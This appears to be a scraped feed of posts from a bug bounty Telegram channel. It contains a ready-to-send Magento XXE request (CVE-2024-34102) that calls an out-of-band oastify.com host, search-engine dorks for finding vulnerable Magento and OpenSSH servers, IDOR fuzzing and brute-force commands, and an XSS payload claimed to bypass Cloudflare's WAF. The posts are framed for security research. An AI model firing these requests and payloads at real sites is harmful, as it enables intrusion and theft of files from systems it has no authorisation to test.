🔹 Web Scanner & Crawler
🔹Fuzzing with Intruder (Part3)
🔹Fuzzing with Intruder (Part2)
🔹Fuzzing with Intruder (Part1)
🔹XSS Validator
🔹Configuring Proxy
🔹Burp Collaborator
🔹HackBar
🔹Burp Sequencer
🔹Turbo Intruder
🔹Engagement Tools
🔹Payload Processing Rule (Part2)
🔹Payload Processing Rule (Part1)
🔹Beginners Guide to Burpsuite Payloads (Part2)
🔹Beginners Guide to Burpsuite Payloads (Part1)
🔹Encoder & Decoder Tutorial
🔹Active Scan++
🔹Software Vulnerability Scanner
🔹Burp’s Project Management
🔹Repeater
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2🫡1
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),
the vulnerability can be escalated to remote code execution.
Hunter: http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":
{"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
🚨Unauthenticated Magento XXE | CVE-2024-34102 | Bug Bounty POC | Brut Security
🚨Magento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠CosmicSting enables attackers to gain unauthorized access
to sensitive files, including…
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠CosmicSting enables attackers to gain unauthorized access
to sensitive files, including…
👍6🤯2😱1
#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🤔1
This media is not supported in your browser
VIEW IN TELEGRAM
Whoever is commenting it doesn't work on latest updates of firefox, the video is for them only. No offence to anyone but you guys lack a lot of research's!
👍3❤1🔥1
When combined with a recent Linux bug (CVE-2024-2961),the vulnerability can be escalated to remote code execution.
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Unauthenticated Magento XXE to Path traversal | CVE-2024-34102 | Bug Bounty POC
🔥Magento XXE CVE-2024-34102: A newly discovered vulnerability dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠️CosmicSting enables attackers to gain unauthorized access to sensitive files…
built on Adobe Commerce and Magento platforms.
⚠️CosmicSting enables attackers to gain unauthorized access to sensitive files…
👍2😱2
Hope you guys learning from the resources which I am sharing, if you have any suggestions or questions you can do comment.
Thanks and Regards,
The Brut Security Team☄️
Thanks and Regards,
The Brut Security Team
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍4
When hunting for IDORs during a bug bounty program, consider the following tip:
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
🔥8👍1
A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">
<img/src=x onError="`${x}`;alert(`Hello`);">
👍11
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
📢CSPRecon: Discover new target domains using Content Security Policy.
⚠️This project was created for educational purposes and should not be used in environments without legal authorization.
🔗 Download: https://github.com/edoardottt/csprecon
⚠️This project was created for educational purposes and should not be used in environments without legal authorization.
🔗 Download: https://github.com/edoardottt/csprecon
👍7
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - v4d1/Dome: Dome - Subdomain Enumeration Tool. Fast and reliable python noscript that makes active and/or passive scan to…
Dome - Subdomain Enumeration Tool. Fast and reliable python noscript that makes active and/or passive scan to obtain subdomains and search for open ports. - GitHub - v4d1/Dome: Dome - Subdomain Enum...
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3🤡2
⚠️ CVE-2024-6387: Critical OpenSSH Unauthenticated RCE Flaw ‘regreSSHion’ Exposes Millions of Linux Systems
🎯96.4 million+ Results are found on the en.fofa.info nearly year.
💥FOFA Dork: app="OpenSSH"
🔖Refer: https://lnkd.in/gkENKHPv
ℹ️POC: https://lnkd.in/gzEWNHAX
#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
🎯96.4 million+ Results are found on the en.fofa.info nearly year.
💥FOFA Dork: app="OpenSSH"
🔖Refer: https://lnkd.in/gkENKHPv
ℹ️POC: https://lnkd.in/gzEWNHAX
#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
🔥2
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤🔥1👍1
🔍List of GitHub Dorks for bug bounties.
📋Finding
target Files, Languages, API Keys,
Tokens, Usernames, Passwords, Information using
Dates, Extension 📓
🔖#infosec #cybersecurity #hacking #pentesting #security
📋Finding
target Files, Languages, API Keys,
Tokens, Usernames, Passwords, Information using
Dates, Extension 📓
🔖#infosec #cybersecurity #hacking #pentesting #security
🔥7👍1